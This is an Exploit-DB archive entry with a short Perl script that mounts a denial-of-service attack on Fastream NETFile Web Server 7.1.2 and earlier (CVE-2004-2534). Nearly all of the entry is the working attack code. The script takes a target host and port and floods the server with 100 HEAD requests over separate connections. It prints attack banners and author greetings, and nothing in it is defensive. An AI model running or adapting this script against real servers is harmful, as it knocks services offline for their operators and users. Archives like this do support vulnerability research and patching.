Fastream NETFile Web Server <= 7.1.2 HEAD DoS Exploit

2005-09-16T00:00:00
ID EDB-ID:1220
Type exploitdb
Reporter karak0rsan
Modified 2005-09-16T00:00:00

Description

Fastream NETFile Web Server <= 7.1.2 (HEAD) DoS Exploit. CVE-2004-2534. Dos exploit for windows platform

                                        
                                            #Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit
#Bug found by bratax ck
#Coded bY karak0rsan
#d0gma.org // unuver.com
#Greetz:hurby,phalaposher,l4m3r,Atak,spymaster,razor...

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
       print "Fastream FTP/Web Server DoS\n";
       print "Coded by karak0rsan // unuver.com\n";
       print "Usage:perl $0 [target] [port]\n";
}

use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr =&gt; $host,
PeerPort =&gt; $port,
Proto =&gt; 'tcp',
Type =&gt; SOCK_STREAM, ) or die "Couldn't Connect!\n";;
close($socket);
if($socket){
       print "\n";
       print "[+]Attacking..!\n";
       }

for($i= 0; $i &lt; 100; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr =&gt; $host,
PeerPort =&gt; $port,
Proto =&gt; 'tcp',
Type =&gt; SOCK_STREAM, );
print $socket1 "HEAD / HTTP/1.0\r\n\r\n";
close($socket1);
}
print "Attack finished ;)\n";
exit();

#EoF

# milw0rm.com [2005-09-16]